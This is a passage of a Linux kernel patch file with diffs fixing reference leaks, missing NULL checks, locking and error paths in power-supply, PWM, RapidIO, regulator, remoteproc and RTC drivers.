+ 	bq->usb_phy = devm_usb_get_phy(dev, USB_PHY_TYPE_USB2);
++
++	/*
++	 * This must be before bq25890_power_supply_init(), so that it runs
++	 * after devm unregisters the power_supply.
++	 */
++	ret = devm_add_action_or_reset(dev, bq25890_non_devm_cleanup, bq);
++	if (ret)
++		return ret;
++
++	ret = bq25890_register_regulator(bq);
++	if (ret)
++		return ret;
++
+ 	if (!IS_ERR_OR_NULL(bq->usb_phy)) {
+ 		INIT_WORK(&bq->usb_work, bq25890_usb_work);
+ 		bq->usb_nb.notifier_call = bq25890_usb_notifier;
+ 		usb_register_notifier(bq->usb_phy, &bq->usb_nb);
+ 	}
+-#ifdef CONFIG_REGULATOR
+-	else {
+-		struct bq25890_platform_data *pdata = dev_get_platdata(dev);
+-		struct regulator_config cfg = { };
+-		struct regulator_dev *reg;
+-
+-		cfg.dev = dev;
+-		cfg.driver_data = bq;
+-		if (pdata)
+-			cfg.init_data = pdata->regulator_init_data;
+-
+-		reg = devm_regulator_register(dev, &bq25890_vbus_desc, &cfg);
+-		if (IS_ERR(reg))
+-			return dev_err_probe(dev, PTR_ERR(reg), "registering regulator");
+-	}
+-#endif
+ 
+ 	ret = bq25890_power_supply_init(bq);
+ 	if (ret < 0) {
+@@ -1400,7 +1433,7 @@ static struct i2c_driver bq25890_driver = {
+ 		.acpi_match_table = ACPI_PTR(bq25890_acpi_match),
+ 		.pm = &bq25890_pm,
+ 	},
+-	.probe = bq25890_probe,
++	.probe_new = bq25890_probe,
+ 	.remove = bq25890_remove,
+ 	.shutdown = bq25890_shutdown,
+ 	.id_table = bq25890_i2c_ids,
+diff --git a/drivers/power/supply/cw2015_battery.c b/drivers/power/supply/cw2015_battery.c
+index 6d52641151d9a..473522b4326ad 100644
+--- a/drivers/power/supply/cw2015_battery.c
++++ b/drivers/power/supply/cw2015_battery.c
+@@ -699,6 +699,9 @@ static int cw_bat_probe(struct i2c_client *client)
+ 	}
+ 
+ 	cw_bat->battery_workqueue = create_singlethread_workqueue("rk_battery");
++	if (!cw_bat->battery_workqueue)
++		return -ENOMEM;
++
+ 	devm_delayed_work_autocancel(&client->dev,
+ 							  &cw_bat->battery_delay_work, cw_bat_work);
+ 	queue_delayed_work(cw_bat->battery_workqueue,
+diff --git a/drivers/power/supply/power_supply_core.c b/drivers/power/supply/power_supply_core.c
+index 4b5fb172fa994..01d1ac79d982e 100644
+--- a/drivers/power/supply/power_supply_core.c
++++ b/drivers/power/supply/power_supply_core.c
+@@ -750,6 +750,11 @@ int power_supply_get_battery_info(struct power_supply *psy,
+ 		int i, tab_len, size;
+ 
+ 		propname = kasprintf(GFP_KERNEL, "ocv-capacity-table-%d", index);
++		if (!propname) {
++			power_supply_put_battery_info(psy, info);
++			err = -ENOMEM;
++			goto out_put_node;
++		}
+ 		list = of_get_property(battery_np, propname, &size);
+ 		if (!list || !size) {
+ 			dev_err(&psy->dev, "failed to get %s\n", propname);
+@@ -1387,8 +1392,8 @@ create_triggers_failed:
+ register_cooler_failed:
+ 	psy_unregister_thermal(psy);
+ register_thermal_failed:
+-	device_del(dev);
+ wakeup_init_failed:
++	device_del(dev);
+ device_add_failed:
+ check_supplies_failed:
+ dev_set_name_failed:
+diff --git a/drivers/power/supply/rk817_charger.c b/drivers/power/supply/rk817_charger.c
+index f20a6ac584ccd..4f9c1c4179165 100644
+--- a/drivers/power/supply/rk817_charger.c
++++ b/drivers/power/supply/rk817_charger.c
+@@ -1060,8 +1060,10 @@ static int rk817_charger_probe(struct platform_device *pdev)
+ 		return -ENODEV;
+ 
+ 	charger = devm_kzalloc(&pdev->dev, sizeof(*charger), GFP_KERNEL);
+-	if (!charger)
++	if (!charger) {
++		of_node_put(node);
+ 		return -ENOMEM;
++	}
+ 
+ 	charger->rk808 = rk808;
+ 
+diff --git a/drivers/power/supply/z2_battery.c b/drivers/power/supply/z2_battery.c
+index 1897c29848600..d033c1d3ee42a 100644
+--- a/drivers/power/supply/z2_battery.c
++++ b/drivers/power/supply/z2_battery.c
+@@ -206,10 +206,12 @@ static int z2_batt_probe(struct i2c_client *client,
+ 
+ 	charger->charge_gpiod = devm_gpiod_get_optional(&client->dev,
+ 							NULL, GPIOD_IN);
+-	if (IS_ERR(charger->charge_gpiod))
+-		return dev_err_probe(&client->dev,
++	if (IS_ERR(charger->charge_gpiod)) {
++		ret = dev_err_probe(&client->dev,
+ 				     PTR_ERR(charger->charge_gpiod),
+ 				     "failed to get charge GPIO\n");
++		goto err;
++	}
+ 
+ 	if (charger->charge_gpiod) {
+ 		gpiod_set_consumer_name(charger->charge_gpiod, "BATT CHRG");
+diff --git a/drivers/pwm/pwm-mediatek.c b/drivers/pwm/pwm-mediatek.c
+index 6901a44dc428d..a337b47dc2f7d 100644
+--- a/drivers/pwm/pwm-mediatek.c
++++ b/drivers/pwm/pwm-mediatek.c
+@@ -296,7 +296,7 @@ static const struct pwm_mediatek_of_data mt6795_pwm_data = {
+ static const struct pwm_mediatek_of_data mt7622_pwm_data = {
+ 	.num_pwms = 6,
+ 	.pwm45_fixup = false,
+-	.has_ck_26m_sel = false,
++	.has_ck_26m_sel = true,
+ };
+ 
+ static const struct pwm_mediatek_of_data mt7623_pwm_data = {
+diff --git a/drivers/pwm/pwm-mtk-disp.c b/drivers/pwm/pwm-mtk-disp.c
+index c605013e4114c..3fbb4bae93a4e 100644
+--- a/drivers/pwm/pwm-mtk-disp.c
++++ b/drivers/pwm/pwm-mtk-disp.c
+@@ -178,7 +178,7 @@ static void mtk_disp_pwm_get_state(struct pwm_chip *chip,
+ {
+ 	struct mtk_disp_pwm *mdp = to_mtk_disp_pwm(chip);
+ 	u64 rate, period, high_width;
+-	u32 clk_div, con0, con1;
++	u32 clk_div, pwm_en, con0, con1;
+ 	int err;
+ 
+ 	err = clk_prepare_enable(mdp->clk_main);
+@@ -197,7 +197,8 @@ static void mtk_disp_pwm_get_state(struct pwm_chip *chip,
+ 	rate = clk_get_rate(mdp->clk_main);
+ 	con0 = readl(mdp->base + mdp->data->con0);
+ 	con1 = readl(mdp->base + mdp->data->con1);
+-	state->enabled = !!(con0 & BIT(0));
++	pwm_en = readl(mdp->base + DISP_PWM_EN);
++	state->enabled = !!(pwm_en & mdp->data->enable_mask);
+ 	clk_div = FIELD_GET(PWM_CLKDIV_MASK, con0);
+ 	period = FIELD_GET(PWM_PERIOD_MASK, con1);
+ 	/*
+diff --git a/drivers/pwm/pwm-sifive.c b/drivers/pwm/pwm-sifive.c
+index 2d4fa5e5fdd46..bb72393134016 100644
+--- a/drivers/pwm/pwm-sifive.c
++++ b/drivers/pwm/pwm-sifive.c
+@@ -204,8 +204,11 @@ static int pwm_sifive_clock_notifier(struct notifier_block *nb,
+ 	struct pwm_sifive_ddata *ddata =
+ 		container_of(nb, struct pwm_sifive_ddata, notifier);
+ 
+-	if (event == POST_RATE_CHANGE)
++	if (event == POST_RATE_CHANGE) {
++		mutex_lock(&ddata->lock);
+ 		pwm_sifive_update_clock(ddata, ndata->new_rate);
++		mutex_unlock(&ddata->lock);
++	}
+ 
+ 	return NOTIFY_OK;
+ }
+diff --git a/drivers/pwm/pwm-tegra.c b/drivers/pwm/pwm-tegra.c
+index dad9978c91861..249dc01932979 100644
+--- a/drivers/pwm/pwm-tegra.c
++++ b/drivers/pwm/pwm-tegra.c
+@@ -145,8 +145,19 @@ static int tegra_pwm_config(struct pwm_chip *chip, struct pwm_device *pwm,
+ 		 * source clock rate as required_clk_rate, PWM controller will
+ 		 * be able to configure the requested period.
+ 		 */
+-		required_clk_rate =
+-			(NSEC_PER_SEC / period_ns) << PWM_DUTY_WIDTH;
++		required_clk_rate = DIV_ROUND_UP_ULL((u64)NSEC_PER_SEC << PWM_DUTY_WIDTH,
++						     period_ns);
++
++		if (required_clk_rate > clk_round_rate(pc->clk, required_clk_rate))
++			/*
++			 * required_clk_rate is a lower bound for the input
++			 * rate; for lower rates there is no value for PWM_SCALE
++			 * that yields a period less than or equal to the
++			 * requested period. Hence, for lower rates, double the
++			 * required_clk_rate to get a clock rate that can meet
++			 * the requested period.
++			 */
++			required_clk_rate *= 2;
+ 
+ 		err = dev_pm_opp_set_rate(pc->dev, required_clk_rate);
+ 		if (err < 0)
+diff --git a/drivers/rapidio/devices/rio_mport_cdev.c b/drivers/rapidio/devices/rio_mport_cdev.c
+index 2cdc054e53a53..43db495f19861 100644
+--- a/drivers/rapidio/devices/rio_mport_cdev.c
++++ b/drivers/rapidio/devices/rio_mport_cdev.c
+@@ -1804,8 +1804,11 @@ static int rio_mport_add_riodev(struct mport_cdev_priv *priv,
+ 		rio_init_dbell_res(&rdev->riores[RIO_DOORBELL_RESOURCE],
+ 				   0, 0xffff);
+ 	err = rio_add_device(rdev);
+-	if (err)
+-		goto cleanup;
++	if (err) {
++		put_device(&rdev->dev);
++		return err;
++	}
++
+ 	rio_dev_get(rdev);
+ 
+ 	return 0;
+@@ -1901,10 +1904,6 @@ static int mport_cdev_open(struct inode *inode, struct file *filp)
+ 
+ 	priv->md = chdev;
+ 
+-	mutex_lock(&chdev->file_mutex);
+-	list_add_tail(&priv->list, &chdev->file_list);
+-	mutex_unlock(&chdev->file_mutex);
+-
+ 	INIT_LIST_HEAD(&priv->db_filters);
+ 	INIT_LIST_HEAD(&priv->pw_filters);
+ 	spin_lock_init(&priv->fifo_lock);
+@@ -1913,6 +1912,7 @@ static int mport_cdev_open(struct inode *inode, struct file *filp)
+ 			  sizeof(struct rio_event) * MPORT_EVENT_DEPTH,
+ 			  GFP_KERNEL);
+ 	if (ret < 0) {
++		put_device(&chdev->dev);
+ 		dev_err(&chdev->dev, DRV_NAME ": kfifo_alloc failed\n");
+ 		ret = -ENOMEM;
+ 		goto err_fifo;
+@@ -1923,6 +1923,9 @@ static int mport_cdev_open(struct inode *inode, struct file *filp)
+ 	spin_lock_init(&priv->req_lock);
+ 	mutex_init(&priv->dma_lock);
+ #endif
++	mutex_lock(&chdev->file_mutex);
++	list_add_tail(&priv->list, &chdev->file_list);
++	mutex_unlock(&chdev->file_mutex);
+ 
+ 	filp->private_data = priv;
+ 	goto out;
+diff --git a/drivers/rapidio/rio-scan.c b/drivers/rapidio/rio-scan.c
+index 19b0c33f4a62a..fdcf742b2adbc 100644
+--- a/drivers/rapidio/rio-scan.c
++++ b/drivers/rapidio/rio-scan.c
+@@ -454,8 +454,12 @@ static struct rio_dev *rio_setup_device(struct rio_net *net,
+ 				   0, 0xffff);
+ 
+ 	ret = rio_add_device(rdev);
+-	if (ret)
+-		goto cleanup;
++	if (ret) {
++		if (rswitch)
++			kfree(rswitch->route_table);
++		put_device(&rdev->dev);
++		return NULL;
++	}
+ 
+ 	rio_dev_get(rdev);
+ 
+diff --git a/drivers/rapidio/rio.c b/drivers/rapidio/rio.c
+index e74cf09eeff07..9544b8ee0c963 100644
+--- a/drivers/rapidio/rio.c
++++ b/drivers/rapidio/rio.c
+@@ -2186,11 +2186,16 @@ int rio_register_mport(struct rio_mport *port)
+ 	atomic_set(&port->state, RIO_DEVICE_RUNNING);
+ 
+ 	res = device_register(&port->dev);
+-	if (res)
++	if (res) {
+ 		dev_err(&port->dev, "RIO: mport%d registration failed ERR=%d\n",
+ 			port->id, res);
+-	else
++		mutex_lock(&rio_mport_list_lock);
++		list_del(&port->node);
++		mutex_unlock(&rio_mport_list_lock);
++		put_device(&port->dev);
++	} else {
+ 		dev_dbg(&port->dev, "RIO: registered mport%d\n", port->id);
++	}
+ 
+ 	return res;
+ }
+diff --git a/drivers/regulator/core.c b/drivers/regulator/core.c
+index e8c00a884f1f1..3716ba060368c 100644
+--- a/drivers/regulator/core.c
++++ b/drivers/regulator/core.c
+@@ -1002,7 +1002,7 @@ static int drms_uA_update(struct regulator_dev *rdev)
+ 		/* get input voltage */
+ 		input_uV = 0;
+ 		if (rdev->supply)
+-			input_uV = regulator_get_voltage(rdev->supply);
++			input_uV = regulator_get_voltage_rdev(rdev->supply->rdev);
+ 		if (input_uV <= 0)
+ 			input_uV = rdev->constraints->input_uV;
+ 
+@@ -1596,7 +1596,13 @@ static int set_machine_constraints(struct regulator_dev *rdev)
+ 		if (rdev->supply_name && !rdev->supply)
+ 			return -EPROBE_DEFER;
+ 
+-		if (rdev->supply) {
++		/* If supplying regulator has already been enabled,
++		 * it's not intended to have use_count increment
++		 * when rdev is only boot-on.
++		 */
++		if (rdev->supply &&
++		    (rdev->constraints->always_on ||
++		     !regulator_is_enabled(rdev->supply))) {
+ 			ret = regulator_enable(rdev->supply);
+ 			if (ret < 0) {
+ 				_regulator_put(rdev->supply);
+@@ -1640,6 +1646,7 @@ static int set_supply(struct regulator_dev *rdev,
+ 
+ 	rdev->supply = create_regulator(supply_rdev, &rdev->dev, "SUPPLY");
+ 	if (rdev->supply == NULL) {
++		module_put(supply_rdev->owner);
+ 		err = -ENOMEM;
+ 		return err;
+ 	}
+@@ -1813,7 +1820,7 @@ static struct regulator *create_regulator(struct regulator_dev *rdev,
+ 
+ 	regulator = kzalloc(sizeof(*regulator), GFP_KERNEL);
+ 	if (regulator == NULL) {
+-		kfree(supply_name);
++		kfree_const(supply_name);
+ 		return NULL;
+ 	}
+ 
+@@ -1943,6 +1950,7 @@ static struct regulator_dev *regulator_dev_lookup(struct device *dev,
+ 		node = of_get_regulator(dev, supply);
+ 		if (node) {
+ 			r = of_find_regulator_by_node(node);
++			of_node_put(node);
+ 			if (r)
+ 				return r;
+ 
+@@ -5396,6 +5404,7 @@ static struct regulator_coupler generic_regulator_coupler = {
+ 
+ /**
+  * regulator_register - register regulator
++ * @dev: the device that drive the regulator
+  * @regulator_desc: regulator to register
+  * @cfg: runtime configuration for regulator
+  *
+@@ -5404,7 +5413,8 @@ static struct regulator_coupler generic_regulator_coupler = {
+  * or an ERR_PTR() on error.
+  */
+ struct regulator_dev *
+-regulator_register(const struct regulator_desc *regulator_desc,
++regulator_register(struct device *dev,
++		   const struct regulator_desc *regulator_desc,
+ 		   const struct regulator_config *cfg)
+ {
+ 	const struct regulator_init_data *init_data;
+@@ -5413,7 +5423,6 @@ regulator_register(const struct regulator_desc *regulator_desc,
+ 	struct regulator_dev *rdev;
+ 	bool dangling_cfg_gpiod = false;
+ 	bool dangling_of_gpiod = false;
+-	struct device *dev;
+ 	int ret, i;
+ 	bool resolved_early = false;
+ 
+@@ -5426,8 +5435,7 @@ regulator_register(const struct regulator_desc *regulator_desc,
+ 		goto rinse;
+ 	}
+ 
+-	dev = cfg->dev;
+-	WARN_ON(!dev);
++	WARN_ON(!dev || !cfg->dev);
+ 
+ 	if (regulator_desc->name == NULL || regulator_desc->ops == NULL) {
+ 		ret = -EINVAL;
+@@ -5526,7 +5534,7 @@ regulator_register(const struct regulator_desc *regulator_desc,
+ 
+ 	/* register with sysfs */
+ 	rdev->dev.class = &regulator_class;
+-	rdev->dev.parent = dev;
++	rdev->dev.parent = config->dev;
+ 	dev_set_name(&rdev->dev, "regulator.%lu",
+ 		    (unsigned long) atomic_inc_return(&regulator_no));
+ 	dev_set_drvdata(&rdev->dev, rdev);
+@@ -5641,6 +5649,7 @@ unset_supplies:
+ 	regulator_remove_coupling(rdev);
+ 	mutex_unlock(&regulator_list_mutex);
+ wash:
++	regulator_put(rdev->supply);
+ 	kfree(rdev->coupling_desc.coupled_rdevs);
+ 	mutex_lock(&regulator_list_mutex);
+ 	regulator_ena_gpio_free(rdev);
+diff --git a/drivers/regulator/devres.c b/drivers/regulator/devres.c
+index 3265e75e97ab4..5c7ff9b3e8a79 100644
+--- a/drivers/regulator/devres.c
++++ b/drivers/regulator/devres.c
+@@ -385,7 +385,7 @@ struct regulator_dev *devm_regulator_register(struct device *dev,
+ 	if (!ptr)
+ 		return ERR_PTR(-ENOMEM);
+ 
+-	rdev = regulator_register(regulator_desc, config);
++	rdev = regulator_register(dev, regulator_desc, config);
+ 	if (!IS_ERR(rdev)) {
+ 		*ptr = rdev;
+ 		devres_add(dev, ptr);
+diff --git a/drivers/regulator/of_regulator.c b/drivers/regulator/of_regulator.c
+index 0aff1c2886b5d..cd726d4e8fbfb 100644
+--- a/drivers/regulator/of_regulator.c
++++ b/drivers/regulator/of_regulator.c
+@@ -505,7 +505,7 @@ struct regulator_init_data *regulator_of_get_init_data(struct device *dev,
+ 	struct device_node *child;
+ 	struct regulator_init_data *init_data = NULL;
+ 
+-	child = regulator_of_get_init_node(dev, desc);
++	child = regulator_of_get_init_node(config->dev, desc);
+ 	if (!child)
+ 		return NULL;
+ 
+diff --git a/drivers/regulator/qcom-labibb-regulator.c b/drivers/regulator/qcom-labibb-regulator.c
+index 639b71eb41ffe..bcf7140f3bc98 100644
+--- a/drivers/regulator/qcom-labibb-regulator.c
++++ b/drivers/regulator/qcom-labibb-regulator.c
+@@ -822,6 +822,7 @@ static int qcom_labibb_regulator_probe(struct platform_device *pdev)
+ 			if (irq == 0)
+ 				irq = -EINVAL;
+ 
++			of_node_put(reg_node);
+ 			return dev_err_probe(vreg->dev, irq,
+ 					     "Short-circuit irq not found.\n");
+ 		}
+diff --git a/drivers/regulator/qcom-rpmh-regulator.c b/drivers/regulator/qcom-rpmh-regulator.c
+index 4158ff126a67a..f90bcdeecea58 100644
+--- a/drivers/regulator/qcom-rpmh-regulator.c
++++ b/drivers/regulator/qcom-rpmh-regulator.c
+@@ -1187,7 +1187,7 @@ static const struct rpmh_vreg_init_data pm7325_vreg_data[] = {
+ static const struct rpmh_vreg_init_data pmr735a_vreg_data[] = {
+ 	RPMH_VREG("smps1",  "smp%s1",  &pmic5_ftsmps520, "vdd-s1"),
+ 	RPMH_VREG("smps2",  "smp%s2",  &pmic5_ftsmps520, "vdd-s2"),
+-	RPMH_VREG("smps3",  "smp%s3",  &pmic5_hfsmps510, "vdd-s3"),
++	RPMH_VREG("smps3",  "smp%s3",  &pmic5_hfsmps515, "vdd-s3"),
+ 	RPMH_VREG("ldo1",   "ldo%s1",  &pmic5_nldo,      "vdd-l1-l2"),
+ 	RPMH_VREG("ldo2",   "ldo%s2",  &pmic5_nldo,      "vdd-l1-l2"),
+ 	RPMH_VREG("ldo3",   "ldo%s3",  &pmic5_nldo,      "vdd-l3"),
+diff --git a/drivers/regulator/stm32-vrefbuf.c b/drivers/regulator/stm32-vrefbuf.c
+index 30ea3bc8ca192..7a454b7b6eab9 100644
+--- a/drivers/regulator/stm32-vrefbuf.c
++++ b/drivers/regulator/stm32-vrefbuf.c
+@@ -210,7 +210,7 @@ static int stm32_vrefbuf_probe(struct platform_device *pdev)
+ 						      pdev->dev.of_node,
+ 						      &stm32_vrefbuf_regu);
+ 
+-	rdev = regulator_register(&stm32_vrefbuf_regu, &config);
++	rdev = regulator_register(&pdev->dev, &stm32_vrefbuf_regu, &config);
+ 	if (IS_ERR(rdev)) {
+ 		ret = PTR_ERR(rdev);
+ 		dev_err(&pdev->dev, "register failed with error %d\n", ret);
+diff --git a/drivers/remoteproc/qcom_q6v5_pas.c b/drivers/remoteproc/qcom_q6v5_pas.c
+index 6afd0941e5524..dc6f07ca83410 100644
+--- a/drivers/remoteproc/qcom_q6v5_pas.c
++++ b/drivers/remoteproc/qcom_q6v5_pas.c
+@@ -449,6 +449,7 @@ static int adsp_alloc_memory_region(struct qcom_adsp *adsp)
+ 	}
+ 
+ 	ret = of_address_to_resource(node, 0, &r);
++	of_node_put(node);
+ 	if (ret)
+ 		return ret;
+ 
+@@ -556,6 +557,7 @@ static int adsp_probe(struct platform_device *pdev)
+ detach_proxy_pds:
+ 	adsp_pds_detach(adsp, adsp->proxy_pds, adsp->proxy_pd_count);
+ free_rproc:
++	device_init_wakeup(adsp->dev, false);
+ 	rproc_free(rproc);
+ 
+ 	return ret;
+@@ -572,6 +574,8 @@ static int adsp_remove(struct platform_device *pdev)
+ 	qcom_remove_sysmon_subdev(adsp->sysmon);
+ 	qcom_remove_smd_subdev(adsp->rproc, &adsp->smd_subdev);
+ 	qcom_remove_ssr_subdev(adsp->rproc, &adsp->ssr_subdev);
++	adsp_pds_detach(adsp, adsp->proxy_pds, adsp->proxy_pd_count);
++	device_init_wakeup(adsp->dev, false);
+ 	rproc_free(adsp->rproc);
+ 
+ 	return 0;
+diff --git a/drivers/remoteproc/qcom_q6v5_wcss.c b/drivers/remoteproc/qcom_q6v5_wcss.c
+index bb0947f7770ea..ba24d745b2d65 100644
+--- a/drivers/remoteproc/qcom_q6v5_wcss.c
++++ b/drivers/remoteproc/qcom_q6v5_wcss.c
+@@ -351,7 +351,7 @@ static int q6v5_wcss_qcs404_power_on(struct q6v5_wcss *wcss)
+ 	if (ret) {
+ 		dev_err(wcss->dev,
+ 			"xo cbcr enabling timed out (rc:%d)\n", ret);
+-		return ret;
++		goto disable_xo_cbcr_clk;
+ 	}
+ 
+ 	writel(0, wcss->reg_base + Q6SS_CGC_OVERRIDE);
+@@ -417,6 +417,7 @@ disable_sleep_cbcr_clk:
+ 	val = readl(wcss->reg_base + Q6SS_SLEEP_CBCR);
+ 	val &= ~Q6SS_CLK_ENABLE;
+ 	writel(val, wcss->reg_base + Q6SS_SLEEP_CBCR);
++disable_xo_cbcr_clk:
+ 	val = readl(wcss->reg_base + Q6SS_XO_CBCR);
+ 	val &= ~Q6SS_CLK_ENABLE;
+ 	writel(val, wcss->reg_base + Q6SS_XO_CBCR);
+@@ -827,6 +828,9 @@ static int q6v5_wcss_init_mmio(struct q6v5_wcss *wcss,
+ 	int ret;
+ 
+ 	res = platform_get_resource_byname(pdev, IORESOURCE_MEM, "qdsp6");
++	if (!res)
++		return -EINVAL;
++
+ 	wcss->reg_base = devm_ioremap(&pdev->dev, res->start,
+ 				      resource_size(res));
+ 	if (!wcss->reg_base)
+diff --git a/drivers/remoteproc/qcom_sysmon.c b/drivers/remoteproc/qcom_sysmon.c
+index 57dde2a69b9dd..15af52f8499eb 100644
+--- a/drivers/remoteproc/qcom_sysmon.c
++++ b/drivers/remoteproc/qcom_sysmon.c
+@@ -652,7 +652,9 @@ struct qcom_sysmon *qcom_add_sysmon_subdev(struct rproc *rproc,
+ 		if (sysmon->shutdown_irq != -ENODATA) {
+ 			dev_err(sysmon->dev,
+ 				"failed to retrieve shutdown-ack IRQ\n");
+-			return ERR_PTR(sysmon->shutdown_irq);
++			ret = sysmon->shutdown_irq;
++			kfree(sysmon);
++			return ERR_PTR(ret);
+ 		}
+ 	} else {
+ 		ret = devm_request_threaded_irq(sysmon->dev,
+@@ -663,6 +665,7 @@ struct qcom_sysmon *qcom_add_sysmon_subdev(struct rproc *rproc,
+ 		if (ret) {
+ 			dev_err(sysmon->dev,
+ 				"failed to acquire shutdown-ack IRQ\n");
++			kfree(sysmon);
+ 			return ERR_PTR(ret);
+ 		}
+ 	}
+diff --git a/drivers/remoteproc/remoteproc_core.c b/drivers/remoteproc/remoteproc_core.c
+index 8768cb64f560c..cb1d414a23896 100644
+--- a/drivers/remoteproc/remoteproc_core.c
++++ b/drivers/remoteproc/remoteproc_core.c
+@@ -509,7 +509,13 @@ static int rproc_handle_vdev(struct rproc *rproc, void *ptr,
+ 	rvdev_data.rsc_offset = offset;
+ 	rvdev_data.rsc = rsc;
+ 
+-	pdev = platform_device_register_data(dev, "rproc-virtio", rvdev_data.index, &rvdev_data,
++	/*
++	 * When there is more than one remote processor, rproc->nb_vdev number is
++	 * same for each separate instances of "rproc". If rvdev_data.index is used
++	 * as device id, then we get duplication in sysfs, so need to use
++	 * PLATFORM_DEVID_AUTO to auto select device id.
++	 */
++	pdev = platform_device_register_data(dev, "rproc-virtio", PLATFORM_DEVID_AUTO, &rvdev_data,
+ 					     sizeof(rvdev_data));
+ 	if (IS_ERR(pdev)) {
+ 		dev_err(dev, "failed to create rproc-virtio device\n");
+diff --git a/drivers/rtc/class.c b/drivers/rtc/class.c
+index e48223c00c672..e5b7b48cffac0 100644
+--- a/drivers/rtc/class.c
++++ b/drivers/rtc/class.c
+@@ -374,11 +374,11 @@ struct rtc_device *devm_rtc_allocate_device(struct device *dev)
+ 
+ 	rtc->id = id;
+ 	rtc->dev.parent = dev;
+-	err = dev_set_name(&rtc->dev, "rtc%d", id);
++	err = devm_add_action_or_reset(dev, devm_rtc_release_device, rtc);
+ 	if (err)
+ 		return ERR_PTR(err);
+ 
+-	err = devm_add_action_or_reset(dev, devm_rtc_release_device, rtc);
++	err = dev_set_name(&rtc->dev, "rtc%d", id);
+ 	if (err)
+ 		return ERR_PTR(err);
+ 
+diff --git a/drivers/rtc/rtc-cmos.c b/drivers/rtc/rtc-cmos.c
+index 58cc2bae2f8a0..00e2ca7374ecf 100644
+--- a/drivers/rtc/rtc-cmos.c
++++ b/drivers/rtc/rtc-cmos.c
+@@ -744,6 +744,168 @@ static irqreturn_t cmos_interrupt(int irq, void *p)
+ 		return IRQ_NONE;
+ }
+ 
++#ifdef	CONFIG_ACPI
++
++#include <linux/acpi.h>
++
++static u32 rtc_handler(void *context)
++{
++	struct device *dev = context;
++	struct cmos_rtc *cmos = dev_get_drvdata(dev);
++	unsigned char rtc_control = 0;
++	unsigned char rtc_intr;
++	unsigned long flags;
++
++
++	/*
++	 * Always update rtc irq when ACPI is used as RTC Alarm.
++	 * Or else, ACPI SCI is enabled during suspend/resume only,
++	 * update rtc irq in that case.
++	 */
++	if (cmos_use_acpi_alarm())
++		cmos_interrupt(0, (void *)cmos->rtc);
++	else {
++		/* Fix me: can we use cmos_interrupt() here as well? */
++		spin_lock_irqsave(&rtc_lock, flags);
++		if (cmos_rtc.suspend_ctrl)
++			rtc_control = CMOS_READ(RTC_CONTROL);
++		if (rtc_control & RTC_AIE) {
++			cmos_rtc.suspend_ctrl &= ~RTC_AIE;
++			CMOS_WRITE(rtc_control, RTC_CONTROL);
++			rtc_intr = CMOS_READ(RTC_INTR_FLAGS);
++			rtc_update_irq(cmos->rtc, 1, rtc_intr);
++		}
++		spin_unlock_irqrestore(&rtc_lock, flags);
++	}
++
++	pm_wakeup_hard_event(dev);
++	acpi_clear_event(ACPI_EVENT_RTC);
++	acpi_disable_event(ACPI_EVENT_RTC, 0);
++	return ACPI_INTERRUPT_HANDLED;
++}
++
++static void acpi_rtc_event_setup(struct device *dev)
++{
++	if (acpi_disabled)
++		return;
++
++	acpi_install_fixed_event_handler(ACPI_EVENT_RTC, rtc_handler, dev);
++	/*
++	 * After the RTC handler is installed, the Fixed_RTC event should
++	 * be disabled. Only when the RTC alarm is set will it be enabled.
++	 */
++	acpi_clear_event(ACPI_EVENT_RTC);
++	acpi_disable_event(ACPI_EVENT_RTC, 0);
++}
++
++static void acpi_rtc_event_cleanup(void)
++{
++	if (acpi_disabled)
++		return;
++
++	acpi_remove_fixed_event_handler(ACPI_EVENT_RTC, rtc_handler);
++}
++
++static void rtc_wake_on(struct device *dev)
++{
++	acpi_clear_event(ACPI_EVENT_RTC);
++	acpi_enable_event(ACPI_EVENT_RTC, 0);
++}
++
++static void rtc_wake_off(struct device *dev)
++{
++	acpi_disable_event(ACPI_EVENT_RTC, 0);
++}
++
++#ifdef CONFIG_X86
++/* Enable use_acpi_alarm mode for Intel platforms no earlier than 2015 */
++static void use_acpi_alarm_quirks(void)
++{
++	if (boot_cpu_data.x86_vendor != X86_VENDOR_INTEL)
++		return;
++
++	if (!is_hpet_enabled())
++		return;
++
++	if (dmi_get_bios_year() < 2015)
++		return;
++
++	use_acpi_alarm = true;
++}
++#else
++static inline void use_acpi_alarm_quirks(void) { }
++#endif
++
++static void acpi_cmos_wake_setup(struct device *dev)
++{
++	if (acpi_disabled)
++		return;
++
++	use_acpi_alarm_quirks();
++
++	cmos_rtc.wake_on = rtc_wake_on;
++	cmos_rtc.wake_off = rtc_wake_off;
++
++	/* ACPI tables bug workaround. */
++	if (acpi_gbl_FADT.month_alarm && !acpi_gbl_FADT.day_alarm) {
++		dev_dbg(dev, "bogus FADT month_alarm (%d)\n",
++			acpi_gbl_FADT.month_alarm);
++		acpi_gbl_FADT.month_alarm = 0;
++	}
++
++	cmos_rtc.day_alrm = acpi_gbl_FADT.day_alarm;
++	cmos_rtc.mon_alrm = acpi_gbl_FADT.month_alarm;
++	cmos_rtc.century = acpi_gbl_FADT.century;
++
++	if (acpi_gbl_FADT.flags & ACPI_FADT_S4_RTC_WAKE)
++		dev_info(dev, "RTC can wake from S4\n");
++
++	/* RTC always wakes from S1/S2/S3, and often S4/STD */
++	device_init_wakeup(dev, 1);
++}
++
++static void cmos_check_acpi_rtc_status(struct device *dev,
++					      unsigned char *rtc_control)
++{
++	struct cmos_rtc *cmos = dev_get_drvdata(dev);
++	acpi_event_status rtc_status;
++	acpi_status status;
++
++	if (acpi_gbl_FADT.flags & ACPI_FADT_FIXED_RTC)
++		return;
++
++	status = acpi_get_event_status(ACPI_EVENT_RTC, &rtc_status);
++	if (ACPI_FAILURE(status)) {
++		dev_err(dev, "Could not get RTC status\n");
++	} else if (rtc_status & ACPI_EVENT_FLAG_SET) {
++		unsigned char mask;
++		*rtc_control &= ~RTC_AIE;
++		CMOS_WRITE(*rtc_control, RTC_CONTROL);
++		mask = CMOS_READ(RTC_INTR_FLAGS);
++		rtc_update_irq(cmos->rtc, 1, mask);
++	}
++}
++
++#else /* !CONFIG_ACPI */
++
++static inline void acpi_rtc_event_setup(struct device *dev)
++{
++}
++
++static inline void acpi_rtc_event_cleanup(void)
++{
++}
++
++static inline void acpi_cmos_wake_setup(struct device *dev)
++{
++}
++
++static inline void cmos_check_acpi_rtc_status(struct device *dev,
++					      unsigned char *rtc_control)
++{
++}
++#endif /* CONFIG_ACPI */
++
+ #ifdef	CONFIG_PNP
+ #define	INITSECTION
+ 
+@@ -827,19 +989,27 @@ cmos_do_probe(struct device *dev, struct resource *ports, int rtc_irq)
+ 		if (info->address_space)
+ 			address_space = info->address_space;
+ 
